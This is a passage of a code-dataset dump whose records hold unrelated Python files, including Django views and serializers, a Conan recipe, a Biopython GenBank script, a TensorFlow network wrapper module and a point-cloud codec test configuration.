'Project/table1.html', context)\n\n@allowed_users(allowed_roles=['Users'])\n@login_required(login_url='login')\ndef Free_Quote(request):\n form = Free_Quotation_form()\n if request.method == 'POST':\n form = Free_Quotation_form(request.POST,request.FILES)\n if form.is_valid():\n form.save()\n return redirect('/')\n context = {'form' :form}\n return render(request, 'Project/FreeQuotation.html', context)\n\n\n@login_required(login_url='login')\n# def update(request, pk):\n# # person = Sign_up.objects.get(id=pk)\n# # form = Sign_up_form(instance=person)\n# # if request.method == 'POST':\n# # form = Sign_up_form(request.POST, instance=person)\n# # if form.is_valid():\n# # form.save()\n# # return redirect('/table')\n# # context = {'formn' :form}\n# # return render(request, 'Project/FreeQuotation.html', context)\n\ndef update(request, pk):\n user = Free_Quotation.objects.get(id=pk)\n form = StatusForm(instance=user)\n\n if request.method == 'POST':\n form = StatusForm(request.POST, 
instance=user)\n if form.is_valid():\n form.save()\n return redirect('/table1')\n\n context = {'form':form}\n return render(request, 'Project/FreeQuotation.html', context)\n\n\n\n\n\n","sub_path":"AoeApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"247460543","text":"from conans import CMake, ConanFile, tools\nimport os\n\n\nclass LibqrencodeConan(ConanFile):\n name = \"libqrencode\"\n description = \"A fast and compact QR Code encoding library\"\n url = \"https://github.com/conan-io/conan-center-index\"\n homepage = \"https://github.com/fukuchi/libqrencode\"\n license = (\"LGPL-2.1-or-later\")\n exports_sources = \"CMakeLists.txt\", \"patches/**\"\n generators = \"cmake\", \"cmake_find_package\"\n settings = \"os\", \"arch\", \"compiler\", \"build_type\"\n options = {\n \"shared\": [True, False],\n \"fPIC\": [True, False],\n }\n default_options = {\n \"shared\": False,\n \"fPIC\": True,\n }\n requires = (\n \"libiconv/1.15\",\n \"libpng/1.6.37\",\n )\n\n @property\n def _source_subfolder(self):\n return \"source_subfolder\"\n\n @property\n def _build_subfolder(self):\n return \"build_subfolder\"\n\n def config_options(self):\n if self.settings.os == \"Windows\":\n del self.options.fPIC\n\n def configure(self):\n if self.options.shared:\n del self.options.fPIC\n del self.settings.compiler.cppstd\n del self.settings.compiler.libcxx\n\n def source(self):\n tools.get(**self.conan_data[\"sources\"][self.version])\n os.rename(\"libqrencode-{}\".format(self.version), self._source_subfolder)\n\n def _configure_cmake(self):\n cmake = CMake(self)\n cmake.definitions[\"WITH_TOOLS\"] = False\n cmake.definitions[\"WITH_TESTS\"] = False\n cmake.configure(build_folder=self._build_subfolder)\n return cmake\n\n def _patch_sources(self):\n for patch in self.conan_data[\"patches\"][self.version]:\n tools.patch(**patch)\n\n def build(self):\n 
self._patch_sources()\n cmake = self._configure_cmake()\n cmake.build()\n\n def package(self):\n self.copy(pattern=\"COPYING\", src=self._source_subfolder, dst=\"licenses\")\n cmake = self._configure_cmake()\n cmake.install()\n\n tools.rmdir(os.path.join(self.package_folder, \"lib\", \"pkgconfig\"))\n tools.rmdir(os.path.join(self.package_folder, \"share\"))\n\n def package_info(self):\n lib = \"qrencode\"\n if self.settings.compiler == \"Visual Studio\" and self.settings.build_type == \"Debug\":\n lib += \"d\"\n self.cpp_info.libs = [lib]\n","sub_path":"recipes/libqrencode/all/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"109887150","text":"#!/usr/bin/env python3\n\nimport time\nimport argparse\nimport os\nimport re\nimport sys\nfrom Bio import SeqIO\nfrom Bio.Seq import Seq\nfrom Bio.SeqRecord import SeqRecord\nfrom Bio.Alphabet import IUPAC, generic_dna\nfrom Bio.SeqFeature import SeqFeature, FeatureLocation\nimport samtools_lookup\nimport pandas as pd\n\n# VARIABLES\ngenes = \"/home/sfrenk/Documents/Resources/Seq/WS251/genes.gtf\"\ntransposons = \"/home/sfrenk/Documents/Resources/Seq/transposons/ce11_repbase/ce11_transposons.gff3\"\n\n###############################################################################\n\ndef add_feature(input_file, gff_file):\n\n\trecord = SeqIO.read(input_file, \"gb\")\n\trecord.seq.alphabet= generic_dna\n\n\tchrom, start, end = get_coords_from_record(record)\n\n\t# Get features\n\tgff = open(gff_file, \"r\")\n\tfor line in gff:\n\n\t\tfeature_chrom = line.strip().split(\"\\t\")[0]\n\t\tfeature_group = line.strip().split(\"\\t\")[1]\n\t\tfeature_start = int(line.strip().split(\"\\t\")[3])\n\t\tfeature_end = int(line.strip().split(\"\\t\")[4])\n\t\tfeature_strand = line.strip().split(\"\\t\")[6]\n\t\tfeature_name = re.search(\"(name|gene_id)[= ]?([^;]+)\", 
line.strip().split(\"\\t\")[8]).group(2)\n\n\t\tif feature_chrom == chrom and feature_start < start and feature_end > end:\n\n\t\t\tannot_start = (feature_start-start)\n\t\t\tannot_end = (feature_end-start)\n\n\t\t\tif feature_strand == \"-\":\n\t\t\t\tannot_strand = -1\n\t\t\telse:\n\t\t\t\tannot_strand = 1\n\n\t\t\tfeature = SeqFeature(FeatureLocation(start = (annot_start), end = (annot_end) + 1), type = 'misc_feature', qualifiers = {\"label\" : feature_name, \"ugene_name\" : feature_name, \"ugene_group\" : feature_group}, strand = annot_strand)\n\t\t\trecord.features.append(feature)\n\n\tgff.close()\n\n\treturn(record)\n\ndef get_coords_from_record(record):\n\n\t# Get chromosomal coords of Ugene file from the ID\n\n\tchrom = re.search(\"^([^:]+)\", record.id).group(1)\n\tstart = int(re.search(\":([0-9]+),\", record.id).group(1))\n\tend = int(re.search(\",([0-9]+)$\", record.id).group(1))\n\n\treturn(chrom, start, end)\n\ndef get_features(record, feature = None):\n\n\t# Get coordinates of record\n\tchrom, start, end = get_coords_from_record(record)\n\n\tfeature_files = [genes, transposons]\n\n\tif feature == None:\n\t\tfeature_files.append(feature)\n\n\t\tfeature_regex = re.compile(\"(gene_name |Name=)([^;]*)\")\n\n\t\tfor i in feature_files:\n\t\t\ttable = pd.read_csv(i, sep = \"\\t\", header = None, usecols = [0,3,4,6,8], names = [\"chrom\", \"start\", \"end\", \"strand\", \"feature\"])\n\n\t\t\t# Find features within the specified genomic range\n\t\t\ttable = table.loc[(table.chrom == chrom) & (table.start > start) & (table.end < end),]\n\n\t\t\tfor k, row in table.iterrows():\n\t\t\t\t\n\t\t\t\tname = str(re.search(feature_regex, row.feature).group(2))\n\t\t\t\t\n\t\t\t\tif row.strand == \"-\":\n\t\t\t\t\tstrand = -1\n\t\t\t\telse:\n\t\t\t\t\tstrand = 1\n\n\t\t\t\tfeature = SeqFeature(FeatureLocation(start = (row.start - args.start), end = (row.end - args.start) + 1), type = 'misc_feature', qualifiers = {\"label\" : name, \"ugene_name\" : name}, strand = 
strand)\n\t\t\t\trecord.features.append(feature)\n\n\treturn(record)\n\n\ndef get_sequence(chrom, start, end, name = None):\n\n\tseq_object = samtools_lookup.get_seq(chrom, start, end).seq\n\n\t# Create a record\n\tcoords = chrom + \":\" + str(start) + \",\" + str(end)\n\trecord = SeqRecord(seq_object,\n\t id = coords,\n\t name = name,\n\t description='Created using ugene_fetch.py')\n\n\treturn(record)\n\n\ndef save_output(record, output_filename):\n\n\toutput_file = open(output_filename, 'w')\n\tSeqIO.write(record, output_file, 'genbank')\n\toutput_file.close()\n\n\ndef main():\n\n\tparser = argparse.ArgumentParser(description = \"Creates Ugene file with sequence and features using coordinates provided\")\n\n\tparser.add_argument(\"-c\", \"--chromosome\")\n\tparser.add_argument(\"-s\", \"--start\", type = int)\n\tparser.add_argument(\"-e\", \"--end\", type = int)\n\tparser.add_argument(\"-n\", \"--name\", help = \"Name of sequence (by default, the name is constructed from the coordinates)\", default = None)\n\tparser.add_argument(\"-d\", \"--directory\", help = \"Output directory (default: current directory)\", default = \".\")\n\tparser.add_argument(\"-f\", \"--feature\", help = \"Optional gff file containing genomic coordinates of extra features\", default = None)\n\tparser.add_argument(\"-a\", \"--add_feature\", help = \"Add features from gff file (using -f/--feature argument) to existing Ugene file\", default = None)\n\n\targs = parser.parse_args()\n\n\tif args.add_feature != None:\n\n\t\tugene_record = add_feature(args.add_feature, args.feature)\n\t\toutput_name = args.add_feature\n\n\telse:\n\n\t\tif args.name == None:\n\t\t\tname = chrom + \"_\" + str(start) + \"_\" + str(end)\n\t\telse:\n\t\t\tname = args.name\n\n\t\tseq = get_sequence(args.chromosome, args.start, args.end, name)\n\t\tugene_record = get_features(seq, args.feature)\n\t\toutput_name = args.directory + \"/\" + name + \".gb\"\n\t\n\tsave_output(ugene_record, output_name)\n\n\nif __name__ == 
'__main__':\n\n\tmain()\n","sub_path":"ugene_fetch.py","file_name":"ugene_fetch.py","file_ext":"py","file_size_in_byte":4811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"106928812","text":"def selection_sort(arr):\n\n # For every slot in array\n for fillslot in range(len(arr)-1, 0, -1):\n\n maxpos = 0\n\n # For every set of 0 to fillslot+1\n for location in range(1, fillslot+1):\n\n # Set maximum's location\n if arr[location] > arr[maxpos]:\n maxpos = location\n\n temp = arr[fillslot]\n arr[fillslot] = arr[maxpos]\n arr[maxpos] = temp\n\n\narr = [14, 46, 43, 27, 57, 41, 45, 21, 70]\nselection_sort(arr)\nprint(arr)\n","sub_path":"Search and Sorting/selection_sort.py","file_name":"selection_sort.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"316794807","text":"from rest_framework import serializers\nfrom app.models.Address import Address\nfrom app.models.Email import Email\nfrom app.models.PhoneNumber import PhoneNumber\nfrom app.models.Person import Person\n\n\nclass AddressSerializer(serializers.ModelSerializer):\n \n class Meta:\n model = Address\n fields = '__all__'\n extra_kwargs = {'id': {'read_only': False,'required':False}}\n\nclass PhoneNumberSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = PhoneNumber\n fields = '__all__'\n extra_kwargs = {'id': {'read_only': False,'required':False}}\n\nclass EmailSerializer(serializers.ModelSerializer):\n \n class Meta:\n model = Email\n fields = '__all__'\n extra_kwargs = {'id': {'read_only': False,'required':False}}\n\nclass PersonSerializer(serializers.ModelSerializer):\n\n addresses = AddressSerializer(many=True)\n phoneNumbers = PhoneNumberSerializer(many=True)\n emails = EmailSerializer(many = True)\n\n class Meta:\n model = Person\n fields = ('id','firstName','lastName','birthday','addresses','phoneNumbers','emails')\n extra_kwargs = 
{'id': {'read_only': False,'required':False}}\n\n def create(self, validated_data):\n addresses_data = validated_data.pop('addresses')\n phoneNumbers_data = validated_data.pop('phoneNumbers')\n emails_data = validated_data.pop('emails')\n\n newPerson = Person.objects.create(**validated_data)\n \n for address_data in addresses_data:\n Address.objects.create(person = newPerson, **address_data)\n \n for phoneNumber_data in phoneNumbers_data:\n PhoneNumber.objects.create(person = newPerson, **phoneNumber_data)\n \n for email_data in emails_data:\n Email.objects.create(person = newPerson, **email_data)\n \n return newPerson \n\n def update(self,instance,validated_data):\n instance.firstName = validated_data.get('firstName',instance.firstName)\n instance.lastName = validated_data.get('lastName',instance.lastName)\n instance.birthday = validated_data.get('birthday',instance.birthday)\n instance.save()\n\n addresses_data = validated_data.get('addresses')\n phoneNumbers_data = validated_data.get('phoneNumbers')\n emails_data = validated_data.get('emails')\n\n ## DELETING OBJECTS\n emails_db_keys = Email.objects.filter(person_id = instance.id).values_list('id', flat=True) ## EMAILS FROM DATABASE \n emails_keys = list(map(lambda x: x.get('id'), emails_data)) ## EMAILS FROM REQUEST \n\n if emails_keys:\n for key in emails_db_keys:\n if key not in emails_keys:\n Email.objects.filter(id=key).delete()\n else:\n Email.objects.filter(person_id = instance.id).all().delete()\n\n \n phone_db_keys = PhoneNumber.objects.filter(person_id = instance.id).values_list('id',flat = True) ## PHONE NUMBERS FROM DATABASE\n phone_keys = list(map(lambda x: x.get('id'), phoneNumbers_data)) ## PHONE NUMBERS FROM REQUEST\n\n if phone_keys:\n for key in phone_db_keys:\n if key not in phone_keys:\n PhoneNumber.objects.filter(id=key).delete()\n else:\n PhoneNumber.objects.filter(person_id = instance.id).all().delete()\n\n\n address_db_keys = Address.objects.filter(person_id = 
instance.id).values_list('id',flat = True) ## ADDRESSES FROM DATABASE\n address_keys = list(map(lambda x: x.get('id'), addresses_data)) ## ADDRESSES FROM REQUEST\n\n if address_keys:\n for key in address_db_keys:\n if key not in address_keys:\n Address.objects.filter(id=key).delete()\n else:\n Address.objects.filter(person_id = instance.id).all().delete()\n\n\n\n ## UPDATING OBJECTS \n if addresses_data:\n for address in addresses_data:\n address_id = address.get('id',None) \n if address_id: ## MODIFY ADDRESS IF IT EXISTS\n addressItem = Address.objects.get(id=address_id, person = instance)\n addressItem.street = address.get('street', addressItem.street)\n addressItem.postalCode = address.get('postalCode',addressItem.postalCode)\n addressItem.city = address.get('city',addressItem.city)\n addressItem.state = address.get('state',addressItem.state)\n addressItem.save()\n else: ## IF ADDRESS DOES NOT EXIST SO CREATE NEW ONE \n Address.objects.create(person_id = instance.id, **address)\n \n if phoneNumbers_data:\n for phoneNumber in phoneNumbers_data:\n phoneNumber_id = phoneNumber.get('id',None)\n if phoneNumber_id: ## MODIFY PHONE NUMBER IF IT EXISTS\n phoneNumberItem = PhoneNumber.objects.get(id=phoneNumber_id, person_id = instance)\n phoneNumberItem.number = phoneNumber.get('number', phoneNumberItem.number)\n phoneNumberItem.save()\n else: ## IF ADDRESS DOES NOT EXIST SO CREATE NEW ONE\n PhoneNumber.objects.create(person_id = instance.id, **phoneNumber)\n \n if emails_data:\n for email in emails_data:\n email_id = email.get('id',None)\n if email_id: ## MODIFY ADDRESS IF IT EXISTS\n emailItem = Email.objects.get(id=email_id, person = instance)\n emailItem.description = email.get('description', emailItem.description)\n emailItem.save()\n else: ## IF ADDRESS DOES NOT EXIST SO CREATE NEW ONE\n Email.objects.create(person_id = instance.id, **email) \n\n\n return instance\n\n\n 
","sub_path":"app/serializers/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":5919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"228729443","text":"\"\"\"\n Use the RAP model to provide a mask for use in clutter suppression by\n the NEXRAD compositer\n\"\"\"\nfrom __future__ import print_function\nimport os\nimport sys\nimport datetime\nimport warnings\n\nimport numpy as np\nimport pytz\nfrom osgeo import gdal, gdalconst\nfrom scipy import interpolate\nimport pygrib\n\n# n0r_ructemps.py:55: RuntimeWarning: invalid value encountered in less\n# ifreezing = np.where( T < 279.0, 1., 0.)\nwarnings.simplefilter(\"ignore\", RuntimeWarning)\n\n\ndef run(utc):\n \"\"\"Run for a valid timestamp\"\"\"\n grbs = None\n # Search for valid file\n for fhour in range(10):\n ts = utc - datetime.timedelta(hours=fhour)\n fstr = \"%03i\" % (fhour,)\n fn = ts.strftime(\n \"/mesonet/ARCHIVE/data/%Y/%m/%d/model/rap/\"\n \"%H/rap.t%Hz.awp130f\" + fstr + \".grib2\"\n )\n # print fn\n if not os.path.isfile(fn):\n continue\n try:\n grib = pygrib.open(fn)\n grbs = grib.select(name=\"2 metre temperature\")\n except Exception as _exp:\n continue\n if grbs is not None:\n break\n if grbs is None:\n print(\"n0r_ructemps major failure! 
No data found for %s\" % (utc,))\n return\n tmpk_2m = grbs[0].values\n lat, lon = grbs[0].latlons()\n\n x = np.arange(-126.0, -66.0, 0.01)\n y = np.arange(24.0, 50.0, 0.01)\n xx, yy = np.meshgrid(x, y)\n\n T = interpolate.griddata(\n (lon.ravel(), lat.ravel()), tmpk_2m.ravel(), (xx, yy), method=\"cubic\"\n )\n T = np.flipud(T)\n\n \"\"\"\n import matplotlib.pyplot as plt\n plt.subplot(111)\n im = plt.imshow(T, extent=(0,1,1,0))\n plt.colorbar(im)\n plt.savefig('test.png')\n \"\"\"\n\n # Anything less than 6 C we will not consider for masking\n ifreezing = np.where(T < 279.0, 1.0, 0.0)\n\n n0rct = gdal.ColorTable()\n n0rct.SetColorEntry(0, (0, 0, 0))\n n0rct.SetColorEntry(1, (255, 0, 0))\n\n out_driver = gdal.GetDriverByName(\"GTiff\")\n outfn = \"data/ifreeze-%s.tif\" % (utc.strftime(\"%Y%m%d%H\"),)\n outdataset = out_driver.Create(outfn, 6000, 2600, 1, gdalconst.GDT_Byte)\n # Set output color table to match input\n outdataset.GetRasterBand(1).SetRasterColorTable(n0rct)\n outdataset.GetRasterBand(1).WriteArray(ifreezing)\n\n\ndef main(argv):\n \"\"\"Go Main Go\"\"\"\n # Script runs at :58 after and we generate a file valid for the next hour\n utc = datetime.datetime.utcnow()\n utc = utc + datetime.timedelta(hours=1)\n utc = utc.replace(tzinfo=pytz.utc)\n if len(argv) == 5:\n utc = utc.replace(\n year=int(argv[1]), month=int(argv[2]), day=int(argv[3]), hour=int(argv[4])\n )\n run(utc)\n\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","sub_path":"n0r_ructemps.py","file_name":"n0r_ructemps.py","file_ext":"py","file_size_in_byte":2693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"69668120","text":"from django.core.management.base import BaseCommand\n\nfrom hosting.models import UserCardDetail\nfrom membership.models import CustomUser\nfrom utils.stripe_utils import StripeUtils\n\n\nclass Command(BaseCommand):\n help = '''Imports the usercard details of all customers. 
Created just for\n multiple card support.'''\n\n def handle(self, *args, **options):\n try:\n stripe_utils = StripeUtils()\n for user in CustomUser.objects.all():\n if hasattr(user, 'stripecustomer'):\n if user.stripecustomer:\n card_details_resp = stripe_utils.get_card_details(\n user.stripecustomer.stripe_id\n )\n card_details = card_details_resp['response_object']\n if card_details:\n ucd = UserCardDetail.get_or_create_user_card_detail(\n stripe_customer=user.stripecustomer,\n card_details=card_details\n )\n UserCardDetail.save_default_card_local(\n user.stripecustomer.stripe_id,\n ucd.card_id\n )\n print(\"Saved user card details for {}\".format(\n user.email\n ))\n else:\n print(\" --- Could not get card details for \"\n \"{}\".format(user.email))\n print(\" --- Error: {}\".format(\n card_details_resp['error']\n ))\n else:\n print(\" === {} does not have a StripeCustomer object\".format(\n user.email\n ))\n except Exception as e:\n print(\" *** Error occurred. Details {}\".format(str(e)))\n","sub_path":"hosting/management/commands/import_usercarddetails.py","file_name":"import_usercarddetails.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"443589975","text":"#!/usr/bin/env python\n# encoding: utf-8\n'''\n@author: songyunlong\n@license: (C) Copyright 2018-2021, Node Supply Chain Manager Corporation Limited.\n@contact: 1243049371@qq.com\n@software:PyCharm\n@file: AllNet\n@time: 2019/2/2 23:08\n@desc:\n'''\nimport tensorflow as tf\nimport numpy as np\n\nclass NeuralNetwork:\n\n @staticmethod\n def flat(tensor):\n '''\n 将高维张量维度降至二维\n :param tensor: type= Variable, 待处理张量\n :return: 维度坍塌后的低维张量\n '''\n # 张量维度\n dimension = tensor.get_shape().as_list() # type= list\n all_dim = np.multiply.reduce(np.array(dimension))\n return tf.reshape(tensor, shape=(all_dim,)) # type= Variable\n\n def __init__(self, x):\n '''\n 神经网络构造函数\n :param x: 单一数据特征\n '''\n self.x = x\n\nclass 
FNN(NeuralNetwork):\n\n @staticmethod\n def fc_layer(para, w, b, keep_prob):\n '''\n :param para: shape= (1, den)单层输入\n :param w: shape= (den, den_w), 参数矩阵\n :param b: shape= (den_w, )偏置矩阵\n 单层全连接层,加入dropout和relu操作\n :return: op, 单层节点\n '''\n h = tf.matmul(para, w) + b\n h = tf.nn.dropout(h, keep_prob)\n h = tf.nn.relu(h)\n return h\n\n def __init__(self, x, w):\n '''\n 全连接网络构造函数\n :param x: Tensor, 单一数据特征\n :param w: types = ((W, bia),..., ), W, b为参数矩阵和偏置矩阵\n '''\n super(FNN, self).__init__(x)\n self.__w = w\n\n def fc_concat(self, keep_prob):\n '''\n 构建全连接网络部分组合\n :return: op, 全连接网络部分输出节点\n '''\n initial = 1\n fc_ops = None\n for parameters in self.__w:\n w, b = parameters\n if initial:\n fc_ops = FNN.fc_layer(para= self.x, w= w, b= b, keep_prob= keep_prob)\n initial = 0\n else:\n fc_ops = FNN.fc_layer(para= fc_ops, w= w, b= b, keep_prob= keep_prob)\n\n return fc_ops\n\n\nclass CNN(NeuralNetwork):\n\n @staticmethod\n def reshape(f_vector, new_shape):\n '''\n 对输入Tensor类型张量进行维度变换\n :param f_vector: type= Tensor, 待处理特征向量\n :param new_shape: iterable, 变换后维度\n :return: 处理后的特征向量\n '''\n return tf.reshape(f_vector, new_shape)\n\n def __init__(self, x, w_conv, stride_conv, stride_pool):\n '''\n 卷积神经网络构造函数\n :param x: Tensor, 单一数据特征\n :param w_conv: tf.Variable, 单个卷积核(4维)\n :param stride_conv: 卷积核移动步伐\n :param stride_pool: 池化核移动步伐\n '''\n super(CNN, self).__init__(x)\n self.__w_conv = w_conv\n self.__stride_conv = stride_conv\n self.__stride_pool = stride_pool\n\n def convolution(self, input='x'):\n '''\n 单层卷积操作\n :param input: setdefult:x, 输入待进行卷积操作节点\n :return: ops, 单层卷积操作后节点\n '''\n input = input if input != 'x' else self.x\n return tf.nn.conv2d(input= input, filter= self.__w_conv, strides= [1, self.__stride_conv, self.__stride_conv, 1], padding= 'SAME')\n\n def pooling(self, pool_fun, input):\n '''\n 单层池化操作\n :param input: 输入节点\n :param pool_fun: 池化函数\n :return: 单层池化操作后节点\n '''\n return pool_fun(value= input, ksize= [1, self.__stride_pool, self.__stride_pool, 1],\n 
strides= [1, self.__stride_pool, self.__stride_pool, 1], padding= 'SAME')\n\n def batch_normoalization(self, input, is_training, moving_decay= 0.9, eps= 1e-5):\n '''\n 批处理层操作\n :param input: Tensor/Variable, 输入张量\n :param is_training: type= tf.placeholder, (True/False)指示当前模型是处在训练还是测试时段\n :param moving_decay: 滑动平均所需的衰减率\n :param eps: 防止bn操作时出现分母病态条件\n :return: BN层输出节点\n '''\n #获取张量维度元组\n input_shape = input.get_shape().as_list()\n #BN公式中的期望和方差学习参数\n beta = tf.Variable(tf.zeros(shape= ([input_shape[-1]])), dtype= tf.float32)\n gamma = tf.Variable(tf.ones(shape= ([input_shape[-1]])), dtype= tf.float32)\n axes = list(range(len(input_shape) - 1))\n #计算各个批次的均值和方差节点\n batch_mean, batch_var = tf.nn.moments(x= input, axes= axes)\n #滑动平均处理各个批次的均值和方差\n ema = tf.train.ExponentialMovingAverage(moving_decay)\n\n def mean_var_with_update():\n #设置应用滑动平均的张量节点\n ema_apply_op = ema.apply([batch_mean, batch_var])\n #明确控制依赖\n with tf.control_dependencies([ema_apply_op]):\n return tf.identity(batch_mean), tf.identity(batch_var)\n\n #训练时,更新均值与方差,测试时使用之前最后一次保存的均值与方差\n mean, var = tf.cond(tf.equal(is_training, True), mean_var_with_update,\n lambda: (ema.average(batch_mean), ema.average(batch_var)))\n # 最后执行batch normalization\n return tf.nn.batch_normalization(input, mean, var, beta, gamma, eps)\n\n\nclass RNN(NeuralNetwork):\n\n @staticmethod\n def get_a_cell(num_units, style):\n '''\n 制作一个LSTM/GRU节点\n :param num_units: 隐藏层向量维度\n :param style: 网络名称\n :return: ops, 循环网络节点\n '''\n\n return tf.nn.rnn_cell.LSTMCell(num_units= num_units) if style == 'LSTM' else tf.nn.rnn_cell.GRUCell(num_units= num_units)\n\n @staticmethod\n def reshape(x, max_time):\n '''\n 对输入Tensor特征进行维度转换\n :param x: type: Tensor, 单一特征数据\n :param max_time: 最大循环次数\n :return: 维度转换后的特征\n '''\n den_3 = x.get_shape().as_list()[-1] // max_time\n para_shape = (-1, max_time, den_3)\n return tf.reshape(x, para_shape)\n\n def __init__(self, x, max_time, num_units):\n '''\n 循环网络构造函数\n :param x: Tensor, 单一特征数据\n :param max_time: 
最大循环次数\n :param num_units: 隐藏层向量维度\n '''\n super(RNN, self).__init__(x)\n self.__max_time = max_time\n self.__num_units = num_units\n\n def dynamic_rnn(self, style, output_keep_prob):\n '''\n 按时间步展开计算循环网络\n :param style: LSTM/GRU\n :param output_keep_prob: rnn节点中dropout概率\n :return: 各个时间步输出值和最终时间点输出值\n '''\n cell = RNN.get_a_cell(num_units= self.__num_units, style= style)\n #添加在循环网络中加入dropout操作\n cell = tf.nn.rnn_cell.DropoutWrapper(cell= cell, input_keep_prob= 1.0, output_keep_prob= output_keep_prob)\n #将原始输入数据变换维度\n x_in = RNN.reshape(x= self.x, max_time= self.__max_time)\n outputs, fin_state = tf.nn.dynamic_rnn(cell, x_in, dtype= tf.float32)\n return outputs, fin_state\n\n def dynamic_multirnn(self, style, layers_num, output_keep_prob, is_reshape='no'):\n '''\n 按时间步展开计算多层循环网络\n :param style: LSTM/GRU\n :param layers_num: RNN层数\n :param output_keep_prob: rnn节点中dropout概率\n :param is_reshape: 默认为'no', 指示是否需要转换输入张量维度, 若需要可写'yes'\n :return: 各个时间步输出值和最终时间点输出值\n '''\n # 建立多层rnn节点对象\n cells = tf.nn.rnn_cell.MultiRNNCell([tf.nn.rnn_cell.DropoutWrapper(\n cell=RNN.get_a_cell(num_units=self.__num_units, style=style), input_keep_prob=1.0,\n output_keep_prob=output_keep_prob) for _ in range(layers_num)])\n if is_reshape == 'yes':\n x_in = RNN.reshape(x=self.x, max_time=self.__max_time)\n else:\n x_in = self.x\n outputs, fin_state = tf.nn.dynamic_rnn(cells, x_in, dtype=tf.float32)\n return outputs, fin_state\n\nif __name__ == '__main__':\n rnn = RNN(1, 2, 3)\n\n\n\n\n\n\n","sub_path":"Stacking/AllNet.py","file_name":"AllNet.py","file_ext":"py","file_size_in_byte":8485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"547195316","text":"import os\r\n\r\n\r\n#需要修改的参数\r\nhomedir = os.getcwd()\r\ndirpath = homedir + '\\\\'\r\ncfgpath = dirpath + 'cfg\\\\octree-predlift\\\\'\r\ndatasetpath = 'E:\\\\mpeg-pcc-tmc13-master\\\\dataset\\\\'\r\n\r\n\r\ntmc3 = 'tmc3_2.exe'\r\npce = 'pc_error_2.exe'\r\n#os.mkdir('log')\r\nlogpath = 
'log\\\\'\r\n\r\ncatA_lst = list([\t\t\t\t\r\n\t\t\t\t'basketball_player_vox11_00000200',\r\n\t\t\t\t'boxer_viewdep_vox12',\r\n\t\t\t\t'dancer_vox11_00000001',\r\n\t\t\t\t'egyptian_mask_vox12',\r\n\t\t\t\t'facade_00009_vox12',\r\n\t\t\t\t'facade_00015_vox14',\r\n\t\t\t\t'facade_00064_vox11',\r\n\t\t\t\t'frog_00067_vox12',\r\n\t\t\t\t'head_00039_vox12',\r\n\t\t\t\t'house_without_roof_00057_vox12',\r\n\t\t\t\t'longdress_viewdep_vox12',\r\n\t\t\t\t'longdress_vox10_1300',\r\n\t\t\t\t'loot_viewdep_vox12',\r\n\t\t\t\t'loot_vox10_1200',\r\n\t\t\t\t'queen_0200',\r\n\t\t\t\t'redandblack_viewdep_vox12',\r\n\t\t\t\t'redandblack_vox10_1550',\r\n\t\t\t\t'shiva_00035_vox12',\r\n\t\t\t\t'soldier_viewdep_vox12',\r\n\t\t\t\t'soldier_vox10_0690',\r\n\t\t\t\t'thaidancer_viewdep_vox12',\r\n\t\t\t\t'ulb_unicorn_vox13',\r\n\t\t\t\t'citytunnel_q1mm',\r\n\t\t\t\t'overpass_q1mm',\r\n\t\t\t\t'tollbooth_q1mm',\r\n])\r\n\r\ncatB_lst = list([\t\t\t\t\r\n\t\t\t\t'arco_valentino_dense_vox12',\r\n\t\t\t\t'arco_valentino_dense_vox20',\r\n\t\t\t\t'egyptian_mask_vox20',\r\n\t\t\t\t'facade_00009_vox20',\r\n\t\t\t\t'facade_00015_vox20',\r\n\t\t\t\t'facade_00064_vox14',\r\n\t\t\t\t'facade_00064_vox20',\r\n\t\t\t\t'frog_00067_vox20',\r\n\t\t\t\t'head_00039_vox20',\r\n\t\t\t\t'house_without_roof_00057_vox20',\r\n\t\t\t\t'landscape_00014_vox14',\r\n\t\t\t\t'landscape_00014_vox20',\r\n\t\t\t\t'palazzo_carignano_dense_vox14',\r\n\t\t\t\t'palazzo_carignano_dense_vox20',\r\n\t\t\t\t'shiva_00035_vox20',\r\n\t\t\t\t'stanford_area_2_vox16',\r\n\t\t\t\t'stanford_area_2_vox20',\r\n\t\t\t\t'stanford_area_4_vox16',\r\n\t\t\t\t'stanford_area_4_vox20',\r\n\t\t\t\t'staue_klimt_vox12',\r\n\t\t\t\t'staue_klimt_vox20',\r\n\t\t\t\t'ulb_unicorn_hires_vox15',\r\n\t\t\t\t'ulb_unicorn_hires_vox20',\r\n\t\t\t\t'ulb_unicorn_vox20',\r\n])\t\r\n\r\nford_01_file_lst = list()\r\nford_02_file_lst = list()\r\nford_03_file_lst = list()\r\n\r\nnum_lst1 = range(100,1000,1)\r\nnum_lst2 = range(1000,1600,1)\r\nnum_lst3 = 
